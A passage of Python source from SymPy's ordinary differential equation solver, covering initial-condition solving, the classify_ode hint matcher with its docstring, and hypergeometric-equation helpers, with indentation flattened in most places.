sols = solvefunc.get_general_solution()
else:
sols = solvefunc(eq, func, order, match)
if iterable(sols):
rv = [odesimp(eq, s, func, hint) for s in sols]
else:
rv = odesimp(eq, sols, func, hint)
else:
# We still want to integrate (you can disable it separately with the hint)
if isinstance(solvefunc, SingleODESolver):
exprs = solvefunc.get_general_solution(simplify=False)
else:
match['simplify'] = False # Some hints can take advantage of this option
exprs = solvefunc(eq, func, order, match)
if isinstance(exprs, list):
rv = [_handle_Integral(expr, func, hint) for expr in exprs]
else:
rv = _handle_Integral(exprs, func, hint)
if isinstance(rv, list):
rv = _remove_redundant_solutions(eq, rv, order, func.args[0])
if len(rv) == 1:
rv = rv[0]
if ics and not 'power_series' in hint:
if isinstance(rv, (Expr, Eq)):
solved_constants = solve_ics([rv], [r['func']], cons(rv), ics)
rv = rv.subs(solved_constants)
else:
rv1 = []
for s in rv:
try:
solved_constants = solve_ics([s], [r['func']], cons(s), ics)
except ValueError:
continue
rv1.append(s.subs(solved_constants))
if len(rv1) == 1:
return rv1[0]
rv = rv1
return rv
def solve_ics(sols, funcs, constants, ics):
"""
Solve for the constants given initial conditions
``sols`` is a list of solutions.
``funcs`` is a list of functions.
``constants`` is a list of constants.
``ics`` is the set of initial/boundary conditions for the differential
equation. It should be given in the form of ``{f(x0): x1,
f(x).diff(x).subs(x, x2): x3}`` and so on.
Returns a dictionary mapping constants to values.
``solution.subs(constants)`` will replace the constants in ``solution``.
Example
=======
>>> # From dsolve(f(x).diff(x) - f(x), f(x))
>>> from sympy import symbols, Eq, exp, Function
>>> from sympy.solvers.ode.ode import solve_ics
>>> f = Function('f')
>>> x, C1 = symbols('x C1')
>>> sols = [Eq(f(x), C1*exp(x))]
>>> funcs = [f(x)]
>>> constants = [C1]
>>> ics = {f(0): 2}
>>> solved_constants = solve_ics(sols, funcs, constants, ics)
>>> solved_constants
{C1: 2}
>>> sols[0].subs(solved_constants)
Eq(f(x), 2*exp(x))
"""
# Assume ics are of the form f(x0): value or Subs(diff(f(x), x, n), (x,
# x0)): value (currently checked by classify_ode). To solve, replace x
# with x0, f(x0) with value, then solve for constants. For f^(n)(x0),
# differentiate the solution n times, so that f^(n)(x) appears.
x = funcs[0].args[0]
diff_sols = []
subs_sols = []
diff_variables = set()
for funcarg, value in ics.items():
if isinstance(funcarg, AppliedUndef):
x0 = funcarg.args[0]
matching_func = [f for f in funcs if f.func == funcarg.func][0]
S = sols
elif isinstance(funcarg, (Subs, Derivative)):
if isinstance(funcarg, Subs):
# Make sure it stays a subs. Otherwise subs below will produce
# a different looking term.
funcarg = funcarg.doit()
if isinstance(funcarg, Subs):
deriv = funcarg.expr
x0 = funcarg.point[0]
variables = funcarg.expr.variables
matching_func = deriv
elif isinstance(funcarg, Derivative):
deriv = funcarg
x0 = funcarg.variables[0]
variables = (x,)*len(funcarg.variables)
matching_func = deriv.subs(x0, x)
if variables not in diff_variables:
for sol in sols:
if sol.has(deriv.expr.func):
diff_sols.append(Eq(sol.lhs.diff(*variables), sol.rhs.diff(*variables)))
diff_variables.add(variables)
S = diff_sols
else:
raise NotImplementedError("Unrecognized initial condition")
for sol in S:
if sol.has(matching_func):
sol2 = sol
sol2 = sol2.subs(x, x0)
sol2 = sol2.subs(funcarg, value)
# This check is necessary because of issue #15724
if not isinstance(sol2, BooleanAtom) or not subs_sols:
subs_sols = [s for s in subs_sols if not isinstance(s, BooleanAtom)]
subs_sols.append(sol2)
# TODO: Use solveset here
try:
solved_constants = solve(subs_sols, constants, dict=True)
except NotImplementedError:
solved_constants = []
# XXX: We can't differentiate between the solution not existing because of
# invalid initial conditions, and not existing because solve is not smart
# enough. If we could use solveset, this might be improvable, but for now,
# we use NotImplementedError in this case.
if not solved_constants:
raise ValueError("Couldn't solve for initial conditions")
if solved_constants == True:
raise ValueError("Initial conditions did not produce any solutions for constants. Perhaps they are degenerate.")
if len(solved_constants) > 1:
raise NotImplementedError("Initial conditions produced too many solutions for constants")
return solved_constants[0]
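
# Illustrative sketch (not part of the original module) of how ``ics`` flows
# from dsolve() into solve_ics(): the arbitrary constant C1 is eliminated by
# the initial condition.  The ODE below is only an example.
def _example_dsolve_with_ics():
    from sympy import Function
    from sympy.abc import x
    f = Function('f')
    # f' = f with f(0) = 2 should yield Eq(f(x), 2*exp(x)).
    return dsolve(f(x).diff(x) - f(x), f(x), ics={f(0): 2})
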
def classify_ode(eq, func=None, dict=False, ics=None, **kwargs):
r"""
Returns a tuple of possible :py:meth:`~sympy.solvers.ode.dsolve`
classifications for an ODE.
The tuple is ordered so that first item is the classification that
:py:meth:`~sympy.solvers.ode.dsolve` uses to solve the ODE by default. In
general, classifications at the near the beginning of the list will
produce better solutions faster than those near the end, thought there are
always exceptions. To make :py:meth:`~sympy.solvers.ode.dsolve` use a
different classification, use ``dsolve(ODE, func,
hint=<classification>)``. See also the
:py:meth:`~sympy.solvers.ode.dsolve` docstring for different meta-hints
you can use.
If ``dict`` is true, :py:meth:`~sympy.solvers.ode.classify_ode` will
return a dictionary of ``hint:match`` expression terms. This is intended
for internal use by :py:meth:`~sympy.solvers.ode.dsolve`. Note that
because dictionaries are ordered arbitrarily, this will most likely not be
in the same order as the tuple.
You can get help on different hints by executing
``help(ode.ode_hintname)``, where ``hintname`` is the name of the hint
without ``_Integral``.
See :py:data:`~sympy.solvers.ode.allhints` or the
:py:mod:`~sympy.solvers.ode` docstring for a list of all supported hints
that can be returned from :py:meth:`~sympy.solvers.ode.classify_ode`.
Notes
=====
These are remarks on hint names.
``_Integral``
If a classification has ``_Integral`` at the end, it will return the
expression with an unevaluated :py:class:`~.Integral`
class in it. Note that a hint may do this anyway if
:py:meth:`~sympy.core.expr.Expr.integrate` cannot do the integral,
though just using an ``_Integral`` will do so much faster. Indeed, an
``_Integral`` hint will always be faster than its corresponding hint
without ``_Integral`` because
:py:meth:`~sympy.core.expr.Expr.integrate` is an expensive routine.
If :py:meth:`~sympy.solvers.ode.dsolve` hangs, it is probably because
:py:meth:`~sympy.core.expr.Expr.integrate` is hanging on a tough or
impossible integral. Try using an ``_Integral`` hint or
        ``all_Integral`` to get it to return something.
Note that some hints do not have ``_Integral`` counterparts. This is
because :py:func:`~sympy.integrals.integrals.integrate` is not used in
        solving the ODE for those methods. For example, `n`\th order linear
homogeneous ODEs with constant coefficients do not require integration
to solve, so there is no
``nth_linear_homogeneous_constant_coeff_Integrate`` hint. You can
easily evaluate any unevaluated
:py:class:`~sympy.integrals.integrals.Integral`\s in an expression by
doing ``expr.doit()``.
Ordinals
Some hints contain an ordinal such as ``1st_linear``. This is to help
differentiate them from other hints, as well as from other methods
that may not be implemented yet. If a hint has ``nth`` in it, such as
        the ``nth_linear`` hints, this means that the method used applies
to ODEs of any order.
``indep`` and ``dep``
Some hints contain the words ``indep`` or ``dep``. These reference
the independent variable and the dependent function, respectively. For
example, if an ODE is in terms of `f(x)`, then ``indep`` will refer to
`x` and ``dep`` will refer to `f`.
``subs``
        If a hint has the word ``subs`` in it, it means the ODE is solved
by substituting the expression given after the word ``subs`` for a
single dummy variable. This is usually in terms of ``indep`` and
``dep`` as above. The substituted expression will be written only in
characters allowed for names of Python objects, meaning operators will
be spelled out. For example, ``indep``/``dep`` will be written as
``indep_div_dep``.
``coeff``
The word ``coeff`` in a hint refers to the coefficients of something
in the ODE, usually of the derivative terms. See the docstring for
the individual methods for more info (``help(ode)``). This is
        in contrast to ``coefficients``, as in ``undetermined_coefficients``,
which refers to the common name of a method.
``_best``
Methods that have more than one fundamental way to solve will have a
hint for each sub-method and a ``_best`` meta-classification. This
will evaluate all hints and return the best, using the same
considerations as the normal ``best`` meta-hint.
Examples
========
>>> from sympy import Function, classify_ode, Eq
>>> from sympy.abc import x
>>> f = Function('f')
>>> classify_ode(Eq(f(x).diff(x), 0), f(x))
('nth_algebraic',
'separable',
'1st_linear',
'Bernoulli',
'1st_homogeneous_coeff_best',
'1st_homogeneous_coeff_subs_indep_div_dep',
'1st_homogeneous_coeff_subs_dep_div_indep',
'1st_power_series', 'lie_group', 'nth_linear_constant_coeff_homogeneous',
'nth_linear_euler_eq_homogeneous',
'nth_algebraic_Integral', 'separable_Integral',
'1st_linear_Integral', 'Bernoulli_Integral',
'1st_homogeneous_coeff_subs_indep_div_dep_Integral',
'1st_homogeneous_coeff_subs_dep_div_indep_Integral')
>>> classify_ode(f(x).diff(x, 2) + 3*f(x).diff(x) + 2*f(x) - 4)
('nth_linear_constant_coeff_undetermined_coefficients',
'nth_linear_constant_coeff_variation_of_parameters',
'nth_linear_constant_coeff_variation_of_parameters_Integral')
"""
ics = sympify(ics)
prep = kwargs.pop('prep', True)
if func and len(func.args) != 1:
raise ValueError("dsolve() and classify_ode() only "
"work with functions of one variable, not %s" % func)
if isinstance(eq, Equality):
eq = eq.lhs - eq.rhs
# Some methods want the unprocessed equation
eq_orig = eq
if prep or func is None:
eq, func_ = _preprocess(eq, func)
if func is None:
func = func_
x = func.args[0]
f = func.func
y = Dummy('y')
xi = kwargs.get('xi')
eta = kwargs.get('eta')
terms = kwargs.get('n')
order = ode_order(eq, f(x))
# hint:matchdict or hint:(tuple of matchdicts)
# Also will contain "default":<default hint> and "order":order items.
matching_hints = {"order": order}
df = f(x).diff(x)
a = Wild('a', exclude=[f(x)])
d = Wild('d', exclude=[df, f(x).diff(x, 2)])
e = Wild('e', exclude=[df])
k = Wild('k', exclude=[df])
n = Wild('n', exclude=[x, f(x), df])
c1 = Wild('c1', exclude=[x])
a3 = Wild('a3', exclude=[f(x), df, f(x).diff(x, 2)])
b3 = Wild('b3', exclude=[f(x), df, f(x).diff(x, 2)])
c3 = Wild('c3', exclude=[f(x), df, f(x).diff(x, 2)])
r3 = {'xi': xi, 'eta': eta} # Used for the lie_group hint
boundary = {} # Used to extract initial conditions
C1 = Symbol("C1")
# Preprocessing to get the initial conditions out
if ics is not None:
for funcarg in ics:
# Separating derivatives
if isinstance(funcarg, (Subs, Derivative)):
# f(x).diff(x).subs(x, 0) is a Subs, but f(x).diff(x).subs(x,
# y) is a Derivative
if isinstance(funcarg, Subs):
deriv = funcarg.expr
old = funcarg.variables[0]
new = funcarg.point[0]
elif isinstance(funcarg, Derivative):
deriv = funcarg
# No information on this. Just assume it was x
old = x
new = funcarg.variables[0]
if (isinstance(deriv, Derivative) and isinstance(deriv.args[0],
AppliedUndef) and deriv.args[0].func == f and
len(deriv.args[0].args) == 1 and old == x and not
new.has(x) and all(i == deriv.variables[0] for i in
deriv.variables) and not ics[funcarg].has(f)):
dorder = ode_order(deriv, x)
temp = 'f' + str(dorder)
boundary.update({temp: new, temp + 'val': ics[funcarg]})
else:
raise ValueError("Enter valid boundary conditions for Derivatives")
# Separating functions
elif isinstance(funcarg, AppliedUndef):
if (funcarg.func == f and len(funcarg.args) == 1 and
not funcarg.args[0].has(x) and not ics[funcarg].has(f)):
boundary.update({'f0': funcarg.args[0], 'f0val': ics[funcarg]})
else:
raise ValueError("Enter valid boundary conditions for Function")
else:
raise ValueError("Enter boundary conditions of the form ics={f(point}: value, f(x).diff(x, order).subs(x, point): value}")
# Any ODE that can be solved with a combination of algebra and
# integrals e.g.:
# d^3/dx^3(x y) = F(x)
ode = SingleODEProblem(eq_orig, func, x, prep=prep)
solvers = {
NthAlgebraic: ('nth_algebraic',),
FirstLinear: ('1st_linear',),
AlmostLinear: ('almost_linear',),
Bernoulli: ('Bernoulli',),
Factorable: ('factorable',),
RiccatiSpecial: ('Riccati_special_minus2',),
}
for solvercls in solvers:
solver = solvercls(ode)
if solver.matches():
for hints in solvers[solvercls]:
matching_hints[hints] = solver
if solvercls.has_integral:
matching_hints[hints + "_Integral"] = solver
eq = expand(eq)
    # Precondition to try to remove f(x) from the highest order derivative
reduced_eq = None
if eq.is_Add:
deriv_coef = eq.coeff(f(x).diff(x, order))
if deriv_coef not in (1, 0):
r = deriv_coef.match(a*f(x)**c1)
if r and r[c1]:
den = f(x)**r[c1]
reduced_eq = Add(*[arg/den for arg in eq.args])
if not reduced_eq:
reduced_eq = eq
if order == 1:
# NON-REDUCED FORM OF EQUATION matches
r = collect(eq, df, exact=True).match(d + e * df)
if r:
r['d'] = d
r['e'] = e
r['y'] = y
r[d] = r[d].subs(f(x), y)
r[e] = r[e].subs(f(x), y)
# FIRST ORDER POWER SERIES WHICH NEEDS INITIAL CONDITIONS
            # TODO: Hint first order series should match only if d/e is analytic.
            # For now, only d/e and (d/e).diff(arg) are checked for existence at
            # a given point.
            # This is currently done internally in ode_1st_power_series.
point = boundary.get('f0', 0)
value = boundary.get('f0val', C1)
check = cancel(r[d]/r[e])
check1 = check.subs({x: point, y: value})
if not check1.has(oo) and not check1.has(zoo) and \
not check1.has(NaN) and not check1.has(-oo):
check2 = (check1.diff(x)).subs({x: point, y: value})
if not check2.has(oo) and not check2.has(zoo) and \
not check2.has(NaN) and not check2.has(-oo):
rseries = r.copy()
rseries.update({'terms': terms, 'f0': point, 'f0val': value})
matching_hints["1st_power_series"] = rseries
r3.update(r)
## Exact Differential Equation: P(x, y) + Q(x, y)*y' = 0 where
# dP/dy == dQ/dx
try:
if r[d] != 0:
numerator = simplify(r[d].diff(y) - r[e].diff(x))
# The following few conditions try to convert a non-exact
# differential equation into an exact one.
# References : Differential equations with applications
# and historical notes - George E. Simmons
if numerator:
# If (dP/dy - dQ/dx) / Q = f(x)
                        # then exp(integral(f(x)))*equation becomes exact
factor = simplify(numerator/r[e])
variables = factor.free_symbols
if len(variables) == 1 and x == variables.pop():
factor = exp(Integral(factor).doit())
r[d] *= factor
r[e] *= factor
matching_hints["1st_exact"] = r
matching_hints["1st_exact_Integral"] = r
else:
# If (dP/dy - dQ/dx) / -P = f(y)
                            # then exp(integral(f(y)))*equation becomes exact
factor = simplify(-numerator/r[d])
variables = factor.free_symbols
if len(variables) == 1 and y == variables.pop():
factor = exp(Integral(factor).doit())
r[d] *= factor
r[e] *= factor
matching_hints["1st_exact"] = r
matching_hints["1st_exact_Integral"] = r
else:
matching_hints["1st_exact"] = r
matching_hints["1st_exact_Integral"] = r
except NotImplementedError:
# Differentiating the coefficients might fail because of things
# like f(2*x).diff(x). See issue 4624 and issue 4719.
pass
# Any first order ODE can be ideally solved by the Lie Group
# method
matching_hints["lie_group"] = r3
# This match is used for several cases below; we now collect on
# f(x) so the matching works.
r = collect(reduced_eq, df, exact=True).match(d + e*df)
if r:
# Using r[d] and r[e] without any modification for hints
# linear-coefficients and separable-reduced.
num, den = r[d], r[e] # ODE = d/e + df
r['d'] = d
r['e'] = e
r['y'] = y
r[d] = num.subs(f(x), y)
r[e] = den.subs(f(x), y)
## Separable Case: y' == P(y)*Q(x)
r[d] = separatevars(r[d])
r[e] = separatevars(r[e])
# m1[coeff]*m1[x]*m1[y] + m2[coeff]*m2[x]*m2[y]*y'
m1 = separatevars(r[d], dict=True, symbols=(x, y))
m2 = separatevars(r[e], dict=True, symbols=(x, y))
if m1 and m2:
r1 = {'m1': m1, 'm2': m2, 'y': y}
matching_hints["separable"] = r1
matching_hints["separable_Integral"] = r1
## First order equation with homogeneous coefficients:
# dy/dx == F(y/x) or dy/dx == F(x/y)
ordera = homogeneous_order(r[d], x, y)
if ordera is not None:
orderb = homogeneous_order(r[e], x, y)
if ordera == orderb:
# u1=y/x and u2=x/y
u1 = Dummy('u1')
u2 = Dummy('u2')
s = "1st_homogeneous_coeff_subs"
s1 = s + "_dep_div_indep"
s2 = s + "_indep_div_dep"
if simplify((r[d] + u1*r[e]).subs({x: 1, y: u1})) != 0:
matching_hints[s1] = r
matching_hints[s1 + "_Integral"] = r
if simplify((r[e] + u2*r[d]).subs({x: u2, y: 1})) != 0:
matching_hints[s2] = r
matching_hints[s2 + "_Integral"] = r
if s1 in matching_hints and s2 in matching_hints:
matching_hints["1st_homogeneous_coeff_best"] = r
## Linear coefficients of the form
# y'+ F((a*x + b*y + c)/(a'*x + b'y + c')) = 0
# that can be reduced to homogeneous form.
F = num/den
params = _linear_coeff_match(F, func)
if params:
xarg, yarg = params
u = Dummy('u')
t = Dummy('t')
# Dummy substitution for df and f(x).
dummy_eq = reduced_eq.subs(((df, t), (f(x), u)))
reps = ((x, x + xarg), (u, u + yarg), (t, df), (u, f(x)))
dummy_eq = simplify(dummy_eq.subs(reps))
# get the re-cast values for e and d
r2 = collect(expand(dummy_eq), [df, f(x)]).match(e*df + d)
if r2:
orderd = homogeneous_order(r2[d], x, f(x))
if orderd is not None:
ordere = homogeneous_order(r2[e], x, f(x))
if orderd == ordere:
# Match arguments are passed in such a way that it
# is coherent with the already existing homogeneous
# functions.
r2[d] = r2[d].subs(f(x), y)
r2[e] = r2[e].subs(f(x), y)
r2.update({'xarg': xarg, 'yarg': yarg,
'd': d, 'e': e, 'y': y})
matching_hints["linear_coefficients"] = r2
matching_hints["linear_coefficients_Integral"] = r2
## Equation of the form y' + (y/x)*H(x^n*y) = 0
# that can be reduced to separable form
factor = simplify(x/f(x)*num/den)
# Try representing factor in terms of x^n*y
# where n is lowest power of x in factor;
# first remove terms like sqrt(2)*3 from factor.atoms(Mul)
num, dem = factor.as_numer_denom()
num = expand(num)
dem = expand(dem)
def _degree(expr, x):
                # This function calculates the degree of
                # x in an expression. If expr is of the form
                # x**p*y (where p can be a variable or rational), it
                # will return p.
for val in expr:
if val.has(x):
if isinstance(val, Pow) and val.as_base_exp()[0] == x:
return (val.as_base_exp()[1])
elif val == x:
return (val.as_base_exp()[1])
else:
return _degree(val.args, x)
return 0
def _powers(expr):
                # This function returns all the different relative powers of x w.r.t. f(x).
                # If expr = x**p * f(x)**q then it will return {p/q}.
pows = set()
if isinstance(expr, Add):
exprs = expr.atoms(Add)
elif isinstance(expr, Mul):
exprs = expr.atoms(Mul)
elif isinstance(expr, Pow):
exprs = expr.atoms(Pow)
else:
exprs = {expr}
for arg in exprs:
if arg.has(x):
_, u = arg.as_independent(x, f(x))
pow = _degree((u.subs(f(x), y), ), x)/_degree((u.subs(f(x), y), ), y)
pows.add(pow)
return pows
pows = _powers(num)
pows.update(_powers(dem))
pows = list(pows)
if(len(pows)==1) and pows[0]!=zoo:
t = Dummy('t')
r2 = {'t': t}
num = num.subs(x**pows[0]*f(x), t)
dem = dem.subs(x**pows[0]*f(x), t)
test = num/dem
free = test.free_symbols
if len(free) == 1 and free.pop() == t:
r2.update({'power' : pows[0], 'u' : test})
matching_hints['separable_reduced'] = r2
matching_hints["separable_reduced_Integral"] = r2
elif order == 2:
# Liouville ODE in the form
# f(x).diff(x, 2) + g(f(x))*(f(x).diff(x))**2 + h(x)*f(x).diff(x)
# See Goldstein and Braun, "Advanced Methods for the Solution of
# Differential Equations", pg. 98
s = d*f(x).diff(x, 2) + e*df**2 + k*df
r = reduced_eq.match(s)
if r and r[d] != 0:
y = Dummy('y')
g = simplify(r[e]/r[d]).subs(f(x), y)
h = simplify(r[k]/r[d]).subs(f(x), y)
if y in h.free_symbols or x in g.free_symbols:
pass
else:
r = {'g': g, 'h': h, 'y': y}
matching_hints["Liouville"] = r
matching_hints["Liouville_Integral"] = r
# Homogeneous second order differential equation of the form
# a3*f(x).diff(x, 2) + b3*f(x).diff(x) + c3
        # It has a definite power series solution at point x0 if b3/a3 and c3/a3
        # are analytic at x0.
deq = a3*(f(x).diff(x, 2)) + b3*df + c3*f(x)
r = collect(reduced_eq,
[f(x).diff(x, 2), f(x).diff(x), f(x)]).match(deq)
ordinary = False
if r:
if not all([r[key].is_polynomial() for key in r]):
n, d = reduced_eq.as_numer_denom()
reduced_eq = expand(n)
r = collect(reduced_eq,
[f(x).diff(x, 2), f(x).diff(x), f(x)]).match(deq)
if r and r[a3] != 0:
p = cancel(r[b3]/r[a3]) # Used below
q = cancel(r[c3]/r[a3]) # Used below
point = kwargs.get('x0', 0)
check = p.subs(x, point)
if not check.has(oo, NaN, zoo, -oo):
check = q.subs(x, point)
if not check.has(oo, NaN, zoo, -oo):
ordinary = True
r.update({'a3': a3, 'b3': b3, 'c3': c3, 'x0': point, 'terms': terms})
matching_hints["2nd_power_series_ordinary"] = r
# Checking if the differential equation has a regular singular point
# at x0. It has a regular singular point at x0, if (b3/a3)*(x - x0)
# and (c3/a3)*((x - x0)**2) are analytic at x0.
if not ordinary:
p = cancel((x - point)*p)
check = p.subs(x, point)
if not check.has(oo, NaN, zoo, -oo):
q = cancel(((x - point)**2)*q)
check = q.subs(x, point)
if not check.has(oo, NaN, zoo, -oo):
coeff_dict = {'p': p, 'q': q, 'x0': point, 'terms': terms}
matching_hints["2nd_power_series_regular"] = coeff_dict
# For Hypergeometric solutions.
_r = {}
_r.update(r)
rn = match_2nd_hypergeometric(_r, func)
if rn:
matching_hints["2nd_hypergeometric"] = rn
matching_hints["2nd_hypergeometric_Integral"] = rn
# If the ODE has regular singular point at x0 and is of the form
# Eq((x)**2*Derivative(y(x), x, x) + x*Derivative(y(x), x) +
            # (a4**2*x**(2*p) - n**2)*y(x), 0), i.e. Bessel's equation
rn = match_2nd_linear_bessel(r, f(x))
if rn:
matching_hints["2nd_linear_bessel"] = rn
            # If the ODE is ordinary and is of the form of Airy's equation
            # Eq(Derivative(y(x), x, x) - (a*x + b)*y(x), 0)
if p.is_zero:
a4 = Wild('a4', exclude=[x,f(x),df])
b4 = Wild('b4', exclude=[x,f(x),df])
rn = q.match(a4+b4*x)
if rn and rn[b4] != 0:
rn = {'b':rn[a4],'m':rn[b4]}
matching_hints["2nd_linear_airy"] = rn
if order > 0:
# Any ODE that can be solved with a substitution and
# repeated integration e.g.:
        # d^2/dx^2(y) + x*d/dx(y) = constant
        # f'(x) must be finite for this to work
r = _nth_order_reducible_match(reduced_eq, func)
if r:
matching_hints['nth_order_reducible'] = r
# nth order linear ODE
# a_n(x)y^(n) + ... + a_1(x)y' + a_0(x)y = F(x) = b
r = _nth_linear_match(reduced_eq, func, order)
# Constant coefficient case (a_i is constant for all i)
if r and not any(r[i].has(x) for i in r if i >= 0):
# Inhomogeneous case: F(x) is not identically 0
if r[-1]:
eq_homogeneous = Add(eq,-r[-1])
undetcoeff = _undetermined_coefficients_match(r[-1], x, func, eq_homogeneous)
s = "nth_linear_constant_coeff_variation_of_parameters"
matching_hints[s] = r
matching_hints[s + "_Integral"] = r
if undetcoeff['test']:
r['trialset'] = undetcoeff['trialset']
matching_hints[
"nth_linear_constant_coeff_undetermined_coefficients"
] = r
# Homogeneous case: F(x) is identically 0
else:
matching_hints["nth_linear_constant_coeff_homogeneous"] = r
# nth order Euler equation a_n*x**n*y^(n) + ... + a_1*x*y' + a_0*y = F(x)
        # In the case of a homogeneous Euler equation, F(x) = 0
def _test_term(coeff, order):
r"""
Linear Euler ODEs have the form K*x**order*diff(y(x),x,order) = F(x),
where K is independent of x and y(x), order>= 0.
So we need to check that for each term, coeff == K*x**order from
some K. We have a few cases, since coeff may have several
different types.
"""
if order < 0:
raise ValueError("order should be greater than 0")
if coeff == 0:
return True
if order == 0:
if x in coeff.free_symbols:
return False
return True
if coeff.is_Mul:
if coeff.has(f(x)):
return False
return x**order in coeff.args
elif coeff.is_Pow:
return coeff.as_base_exp() == (x, order)
elif order == 1:
return x == coeff
return False
# Find coefficient for highest derivative, multiply coefficients to
# bring the equation into Euler form if possible
r_rescaled = None
if r is not None:
coeff = r[order]
factor = x**order / coeff
r_rescaled = {i: factor*r[i] for i in r if i != 'trialset'}
# XXX: Mixing up the trialset with the coefficients is error-prone.
# These should be separated as something like r['coeffs'] and
# r['trialset']
if r_rescaled and not any(not _test_term(r_rescaled[i], i) for i in
r_rescaled if i != 'trialset' and i >= 0):
if not r_rescaled[-1]:
matching_hints["nth_linear_euler_eq_homogeneous"] = r_rescaled
else:
matching_hints["nth_linear_euler_eq_nonhomogeneous_variation_of_parameters"] = r_rescaled
matching_hints["nth_linear_euler_eq_nonhomogeneous_variation_of_parameters_Integral"] = r_rescaled
e, re = posify(r_rescaled[-1].subs(x, exp(x)))
undetcoeff = _undetermined_coefficients_match(e.subs(re), x)
if undetcoeff['test']:
r_rescaled['trialset'] = undetcoeff['trialset']
matching_hints["nth_linear_euler_eq_nonhomogeneous_undetermined_coefficients"] = r_rescaled
# Order keys based on allhints.
retlist = [i for i in allhints if i in matching_hints]
if dict:
# Dictionaries are ordered arbitrarily, so make note of which
# hint would come first for dsolve(). Use an ordered dict in Py 3.
matching_hints["default"] = retlist[0] if retlist else None
matching_hints["ordered_hints"] = tuple(retlist)
return matching_hints
else:
return tuple(retlist)
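
# Hedged sketch (illustrative only) of the ``dict=True`` form described in the
# docstring above: the returned mapping carries the per-hint match data plus the
# special 'default', 'order' and 'ordered_hints' keys used internally by dsolve().
def _example_classify_ode_dict():
    from sympy import Function
    from sympy.abc import x
    f = Function('f')
    hints = classify_ode(f(x).diff(x) - f(x), f(x), dict=True)
    return hints['default'], hints['order'], hints['ordered_hints']
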
def equivalence(max_num_pow, dem_pow):
    # This function checks for equivalence with the 2F1 type of equation.
    # max_num_pow is the maximum power of x in the numerator
    # and dem_pow is the list of powers of the different factors of the form (a*x + b).
    # Reference: table 1 in the paper "Non-Liouvillian solutions for second order
    # linear ODEs" by L. Chan, E.S. Cheb-Terrab.
# We can extend it for 1F1 and 0F1 type also.
if max_num_pow == 2:
if dem_pow in [[2, 2], [2, 2, 2]]:
return "2F1"
elif max_num_pow == 1:
if dem_pow in [[1, 2, 2], [2, 2, 2], [1, 2], [2, 2]]:
return "2F1"
elif max_num_pow == 0:
        if dem_pow in [[1, 1, 2], [2, 2], [1, 2, 2], [1, 1], [2], [1, 2], [2, 2]]:
return "2F1"
return None
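
# Tiny illustration (not part of the original module) of the table lookup above;
# the argument values are taken directly from the cases handled in equivalence().
def _example_equivalence():
    # Numerator degree 2 with denominator factor powers [2, 2] is a 2F1 case;
    # a combination that is not listed returns None.
    return equivalence(2, [2, 2]), equivalence(0, [3])
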
def equivalence_hypergeometric(A, B, func):
from sympy import factor
# This method for finding the equivalence is only for 2F1 type.
# We can extend it for 1F1 and 0F1 type also.
x = func.args[0]
# making given equation in normal form
I1 = factor(cancel(A.diff(x)/2 + A**2/4 - B))
# computing shifted invariant(J1) of the equation
J1 = factor(cancel(x**2*I1 + S(1)/4))
num, dem = J1.as_numer_denom()
num = powdenest(expand(num))
dem = powdenest(expand(dem))
pow_num = set()
pow_dem = set()
    # This function computes the different powers of the variable x in J1.
    # It then helps in finding the value of k: k is the power of x such that we can express
    # J1 = x**k * J0(x**k), after which all the powers in J0 become integers.
def _power_counting(num):
_pow = {0}
for val in num:
if val.has(x):
if isinstance(val, Pow) and val.as_base_exp()[0] == x:
_pow.add(val.as_base_exp()[1])
elif val == x:
_pow.add(val.as_base_exp()[1])
else:
_pow.update(_power_counting(val.args))
return _pow
pow_num = _power_counting((num, ))
pow_dem = _power_counting((dem, ))
pow_dem.update(pow_num)
_pow = pow_dem
k = gcd(_pow)
# computing I0 of the given equation
I0 = powdenest(simplify(factor(((J1/k**2) - S(1)/4)/((x**k)**2))), force=True)
I0 = factor(cancel(powdenest(I0.subs(x, x**(S(1)/k)), force=True)))
num, dem = I0.as_numer_denom()
max_num_pow = max(_power_counting((num, )))
dem_args = dem.args
sing_point = []
dem_pow = []
# calculating singular point of I0.
for arg in dem_args:
if arg.has(x):
if isinstance(arg, Pow):
# (x-a)**n
dem_pow.append(arg.as_base_exp()[1])
sing_point.append(list(roots(arg.as_base_exp()[0], x).keys())[0])
else:
# (x-a) type
dem_pow.append(arg.as_base_exp()[1])
sing_point.append(list(roots(arg, x).keys())[0])
dem_pow.sort()
    # checking whether the equivalence exists or not.
if equivalence(max_num_pow, dem_pow) == "2F1":
return {'I0':I0, 'k':k, 'sing_point':sing_point, 'type':"2F1"}
else:
return None
def ode_2nd_hypergeometric(eq, func, order, match):
from sympy.simplify.hyperexpand import hyperexpand
from sympy import factor
x = func.args[0]
C0, C1 = get_numbered_constants(eq, num=2)
a = match['a']
b = match['b']
c = match['c']
A = match['A']
# B = match['B']
sol = None
if match['type'] == "2F1":
if c.is_integer == False:
sol = C0*hyper([a, b], [c], x) + C1*hyper([a-c+1, b-c+1], [2-c], x)*x**(1-c)
elif c == 1:
y2 = Integral(exp(Integral((-(a+b+1)*x + c)/(x**2-x), x))/(hyperexpand(hyper([a, b], [c], x))**2), x)*hyper([a, b], [c], x)
sol = C0*hyper([a, b], [c], x) + C1*y2
elif (c-a-b).is_integer == False:
sol = C0*hyper([a, b], [1+a+b-c], 1-x) + C1*hyper([c-a, c-b], [1+c-a-b], 1-x)*(1-x)**(c-a-b)
if sol is None:
raise NotImplementedError("The given ODE " + str(eq) + " cannot be solved by"
+ " the hypergeometric method")
# applying transformation in the solution
subs = match['mobius']
dtdx = simplify(1/(subs.diff(x)))
_B = ((a + b + 1)*x - c).subs(x, subs)*dtdx
_B = factor(_B + ((x**2 -x).subs(x, subs))*(dtdx.diff(x)*dtdx))
_A = factor((x**2 - x).subs(x, subs)*(dtdx**2))
e = exp(logcombine(Integral(cancel(_B/(2*_A)), x), force=True))
sol = sol.subs(x, match['mobius'])
sol = sol.subs(x, x**match['k'])
e = e.subs(x, x**match['k'])
if not A.is_zero:
e1 = Integral(A/2, x)
e1 = exp(logcombine(e1, force=True))
sol = cancel((e/e1)*x**((-match['k']+1)/2))*sol
sol = Eq(func, sol)
return sol
sol = cancel((e)*x**((-match['k']+1)/2))*sol
sol = Eq(func, sol)
return sol
def match_2nd_2F1_hypergeometric(I, k, sing_point, func):
from sympy import factor
x = func.args[0]
a = Wild("a")
b = Wild("b")
c = Wild("c")
t = Wild("t")
s = Wild("s")
r = Wild("r")
alpha = Wild("alpha")
beta = Wild("beta")
gamma = Wild("gamma")
delta = Wild("delta")
rn = {'type':None}
# I0 of the standard 2F1 equation.
